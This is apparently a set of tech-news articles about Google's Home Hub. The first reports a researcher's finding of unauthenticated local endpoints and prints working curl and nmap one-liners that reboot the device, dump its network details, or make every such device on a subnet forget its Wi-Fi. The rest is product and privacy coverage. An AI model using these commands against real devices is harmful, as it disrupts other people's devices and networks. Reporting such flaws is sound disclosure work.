The Google Home Hub is deeply insecure

Security advocate Jerry Gamblin has posted a set of instructions – essentially basic lines of XML – that can easily pull important information off of the Google Home Hub and, in some cases, temporarily brick the device. The Home Hub, which is essentially an Android tablet attached to a speaker, is designed to act as […]

Security advocate Jerry Gamblin has posted a set of instructions – essentially basic lines of XML – that can easily pull important information off of the Google Home Hub and, in some cases, temporarily brick the device.

The Home Hub, which is essentially an Android tablet attached to a speaker, is designed to act as an in-room Google Assistant. This means it connects to Wi-Fi (and allows you to see open Wi-Fi access points near the device), receives video and photos from other devices (and broadcasts its pin), and accepts commands remotely (including a quick reboot via the command line).

The command – which consists of a simple URL call via the command line – is clearly part of the setup process. You can try this at home if you replace “hub” with the Home Hub’s local IP address.

curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://hub:8008/setup/reboot

Other one-liners expose further data, including a number of micro services:

$ curl -s http://hub:8008/setup/eureka_info | jq
{
"bssid": "cc:be:59:8c:11:8b",
"build_version": "136769",
"cast_build_revision": "1.35.136769",
"closed_caption": {},
"connected": true,
"ethernet_connected": false,
"has_update": false,
"hotspot_bssid": "FA:8F:CA:9C:AA:11",
"ip_address": "192.168.1.1",
"locale": "en-US",
"location": {
"country_code": "US",
"latitude": 255,
"longitude": 255
},
"mac_address": "11:A1:1A:11:AA:11",
"name": "Hub Display",
"noise_level": -94,
"opencast_pin_code": "1111",
"opt_in": {
"crash": true,
"opencast": true,
"stats": true
},
"public_key": "Removed",
"release_track": "stable-channel",
"setup_state": 60,
"setup_stats": {
"historically_succeeded": true,
"num_check_connectivity": 0,
"num_connect_wifi": 0,
"num_connected_wifi_not_saved": 0,
"num_initial_eureka_info": 0,
"num_obtain_ip": 0
},
"signal_level": -60,
"ssdp_udn": "11111111-adac-2b60-2102-11111aa111a",
"ssid": "SSID",
"time_format": 2,
"timezone": "America/Chicago",
"tos_accepted": true,
"uma_client_id": "1111a111-8404-437a-87f4-1a1111111a1a",
"uptime": 25244.52,
"version": 9,
"wpa_configured": true,
"wpa_id": 0,
"wpa_state": 10
}

Finally, this line causes all devices on your network to forget their Wi-Fi, forcing you to reenter the setup process.

nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/(|)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{ "wpa_id": 0 }' http://%:8008/setup/forget_wifi

As Gamblin notes, these holes aren’t showstoppers but they are very alarming. Allowing unauthenticated access to these services is lazy at best and dangerous at worst. He also notes that these endpoints have been open for years on various Google devices, which means this is a regular part of the code base and not considered an exploit by Google.

Again, nothing here is mission critical – no Home Hub will ever save my life – but it would be nice to know that devices based on the platform have some modicum of security, even in the form of authentication or obfuscation. Today we can reboot Grandpa’s overcomplicated picture frame with a single line of code but tomorrow we may be able to reboot Grandpa’s oxygen concentrator.

Google Home Hub up close and hands on

While the rumors and leaks didn’t leave much to the imagination ahead of today’s event, I will admit to being a bit surprised by the shape Google’s Home Hub actually took. The renders didn’t do justice to the actual product. For starters, the seven inch screen splits the difference between the Echo Show and Spot […]

While the rumors and leaks didn’t leave much to the imagination ahead of today’s event, I will admit to being a bit surprised by the shape Google’s Home Hub actually took. The renders didn’t do justice to the actual product.

For starters, the seven inch screen splits the difference between the Echo Show and Spot in an interesting way. It’s not a compact device, per say, but it’s a lot smaller than I’d initially expected, and as such, it should fit in a lot more spots at home than the larger Show.

From a design standpoint, the product is best described as a seven-inch tablet resting atop a speaker at ~ a 25 to 30 degree angle. The idea is to give you a screen you can view from the other side of the room. After all, this is a voice first product. While it does have touch functionality enabled, that’s primarily secondary. As such there are certain things you can’t do here like, say, pinch to zoom.

That’s largely a moot point here, given the fact that the product doesn’t have, say, a standard web browser, unlike the new Show. Of course, part of the reason Amazon offers a browser on its own devices is so you can access YouTube. That’s obviously not a problem on a product that very much has native YouTube support.

The other thing the peculiar design affords the product is multi-directional sound. Like the Show, the bulk of the fabric-covered speaker faces back, toward the wall. There is, however, an exposed sliver on the bottom, which sends some of that sound toward you.

The sound is decent for a product of this size, but again, I wouldn’t rely on it as any sort of home entertainment system. If you’ve got multiple Home devices at home, however, you can tell Assistant, “extend to my Home Mini,” etc, and the music will follow you into the other room.

Google also notes that this isn’t really an entertainment consuming machine. The Home Hub isn’t designed for watching movies or even TV shows. Rather, if anything, it’s kind of a YouTube delivery device, in much the same way that the Portal is a real world manifestation of Facebook’s video chat. Of course, right out of the gate, this product is going to offer a much fuller experience than Portal — Facebook, after all, is still kind of testing the water to see what users want our of their devices.

That said, Google tells me that the company is still assessing whether users are interested in smart home hub functionality via something like Z Wave. It’s a bit of a glaring omission here, based on both the added focus on connected home features and the fact that the damn thing has hub in its name. That said, Google seems to prefer building that kind of syncing in via bluetooth, much like it did with those newly announced GE lights.

The Hub does fall under Google’s “Smart Display” category, meaning it’s a direct competitor with products from Lenovo, JBL and LG. The company tells me that there was a gap in announcements simply because it took the company longer to build the product from the ground up. The Hub wasn’t built via hardware partner, but rather from the ground up.

One of the upsides there is pricing. $149 certainly makes this a competitive offering versus the Show and Portal.

more Google Event 2018 coverage

Google’s Home Hub has a screen but no camera ‘so that it is comfortable in private spaces’

Is Google finally taking consumers’ privacy concerns to heart? Today, the search and Android giant took the wraps off its $149 Home Hub, a new screen-based smart home device that lets you interact with Google services like Google Photos and connected smart home devices. It’s Google’s answer to the Amazon Echo Show and Facebook’s new […]

Is Google finally taking consumers’ privacy concerns to heart? Today, the search and Android giant took the wraps off its $149 Home Hub, a new screen-based smart home device that lets you interact with Google services like Google Photos and connected smart home devices. It’s Google’s answer to the Amazon Echo Show and Facebook’s new Portal. But in this age of privacy, the company made an interesting feature choice: it will be shipping the first version of the device without a camera built in.

“We also consciously did not put a camera on so that it was comfortable to us in the private spaces of your home like your bedroom,” noted Diya Jolly, VP of product management in the presentation today, while going through other features on the device.

The feature — or lack thereof, as the case may be — is notable. Just yesterday, Facebook unveiled its own connected home screen device, the Portal, and Amazon has been working hard to push and update its Echo Show, its Alexa-powered home hub with a screen. Both Amazon and Facebook are focused on just now how to show images, but how to capture them and to use visual cues to build more intelligent services.

Google, it would seem, is taking a different approach: tech companies have been under the spotlight for how they are handling privacy these days, and Google’s decision to leave a camera out of this device plays into the idea of how tech companies are trying to be more sensitive to what users want — and maybe need, since we already have so many other devices with cameras on them.

For Google specifically, the timing is especially important: just this week the company announced that it would be shutting down Google+, its ill-fated social network that had a bug in it that exposed the private information of users. The optics — pun intended — of pushing out a new device with a camera on it, at a time when many wonder just how much information these smart home speakers are picking up, would look very bad indeed.

On the other hand, leaving a camera out could serve other ends for Google.

It helps it keep the cost of the device down, with $149 a very competitive price point.

It also could help Google keep this device from competing with others that it is pushing to users — specifically its phones, its new Pixel Slate tablet, which has a front-facing camera for video chat; and the Pixel Stand, which — when combined with the new Pixel 3 smartphone — essentially turns that device into a screen-based home hub that does have a camera.

Lastly, it helps Google start to build a roadmap for features that it could add into the main Home Hub product in later iterations, if it finds that users are requesting it.

more Google Event 2018 coverage

Here’s Google’s Echo Show competitor, the Home Hub

This is Google’s Echo Show competitor, the Home Hub. We knew it was coming, via an avalanche of leaks and now, moments before the event has officially kicked off, here it is in all of its glory by way of the full leaked product video (again spotted by 9 to 5 Google).  The product is […]

This is Google’s Echo Show competitor, the Home Hub. We knew it was coming, via an avalanche of leaks and now, moments before the event has officially kicked off, here it is in all of its glory by way of the full leaked product video (again spotted by 9 to 5 Google).  The product is a looker — especially compared to the last two generations of Amazon’s Echo Show.

Moments later, the head of hardware at Google, Rick Osterloh, made the device official at an event in New York City.

The device looks like an Android tablet mounted on top of a speaker — which ought to address the backward firing sound, which is one of the largest design flaws of the recently introduced Echo Show 2. The speaker fabric comes in a number of different colors, in keeping with the rest of the Pixel/Home products, including the new Aqua.

Google says the product was also purposefully made smaller in order to better fit in the home. Size wise, the device seems to split the difference between the Show and Spot. The product also features ambient light and white balance sensors to adjust to its environment. It will also shut the display off at night, when it’s time to go to bed.

The device joins a trio of “Smart Displays” for Google Assistant built by JBL, Lenovo and LG. Design-wise Lenovo’s was the best of the bunch, but the Home Hub looks to have outclassed it. The functions pretty much what you’d expect from these devices, including traffic, weather and cooking. The Hub features a number of recipes built in, offering you step by step directions, along with quick videos show you how to execute different actions like poaching eggs.

Of course, Google’s got one key, not so secret weapon against Amazon: YouTube. Unlike Amazon, which relies on a browser-based workaround, hub plays videos automatically from Google’s service. That also goes for YouTube Music, making the device the first killer platform for the service, playing music and showing videos. Fittingly, the device will ship with six free months of YouTube Premium.

Google has also clearly made fitness a key piece here, showing off some yoga classes on the product, along with a touchscreen smart home control center. “It truly is the hub for a thoughtful home,” the company said during the event. Home View is the name of the device’s dashboard, which allows you view different smart home products by different rooms.

It’s essentially a one stop shop for Nest and various other smart home products. It looks to be leaps and bounds beyond what Amazon currently offers with the Echo Show. Naturally, the product will also bring video from Nest cameras to the product. The list of compatible products includes devices from Dish and Philips.

more Google Event 2018 coverage